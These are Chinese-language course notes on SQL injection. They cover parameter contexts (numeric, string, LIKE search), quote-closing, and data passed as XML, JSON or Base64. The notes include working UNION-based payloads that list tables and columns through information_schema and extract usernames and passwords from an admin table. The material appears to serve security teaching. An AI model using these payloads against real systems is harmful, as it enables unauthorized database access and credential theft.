知识点:
1、Web攻防-SQL注入-参数类型&参数格式
2、Web攻防-SQL注入-XML&JSON&BASE64等
3、Web攻防-SQL注入-数字字符搜索等符号绕过
案例说明:
在应用中,存在参数值为数字,字符时,符号的介入,另外搜索功能通配符的再次介入,另外传输数据可由最基本的对应赋值传递改为更加智能的XML或JSON格式传递,部分保证更安全的情况还会采用编码或加密形式传递数据,给于安全测试过程中更大的挑战和难度。
一、演示案例-WEB攻防-SQL注入-参数类型&符号干扰
需要考虑闭合问题
数字
select * from news where id=$id;
字符
select * from news where name='$name';
搜索
select * from news where name like '%name%';
符号干扰:有无单引号或双引号及通配符等
%' order by 3#
%' union select 1,2,3#
知道数据库名:news_db
获取数据库名下的表名信息:
借助自带的information_schema.tables表(记录所有数据库名下的表名)
1%' union select 1,2,table_name from information_schema.tables where table_schema='news_db'#
admin表名下的列名
借助自带的information_schema.columns表(记录所有数据库名下的表名对应的列名信息)
1%' union select 1,2,column_name from information_schema.columns where table_schema='news_db' and table_name='admin'#
查询列名相关数据
1%' union select 1,username,password from admin#
二、演示案例-WEB攻防-SQL注入-参数格式&参数编码
1、数据传输采用XML或JSON格式传递
2、数据传输采用编码或加密形式传递
3、数据传递采用JSON又采用编码传递
XML
<?xml version="1.0" encoding="UTF-8"?>
<news><article><id>1</id><title>xiaodi</title><content>i am xiaodi</content><created_at>2025-03-07</created_at></article><article><id>2</id><title>xiaodisec</title><content>i am xiaodisec</content><created_at>2025-03-06</created_at></article>
</news>
JSON
{"news:"[
{"id": 1,"title": "xiaodi","content": "i am xiaodi","created_at": "2025-03-07"
},
{"id": 2,"title": "xiaodisec","content": "i am xiaodisec","created_at": "2025-03-06"
}]
}
Base64
{"news": [
{"id": "MQ==","title": "eGlhb2Rp","content": "aSBhbSB4aWFvZGk=","created_at": "MjAyNS0wMy0wNw=="
},
{"id": "Mg==","title": "eGlhb2Rpc2Vj","content": "aSBhbSB4aWFvZGlzZWM=","created_at": "MjAyNS0wMy0wNg=="
}]
}
实例应用-编码注入案例
https://mp.weixin.qq.com/s/Xf08xaV-YcZsQopE19pPEQ
详解)
)
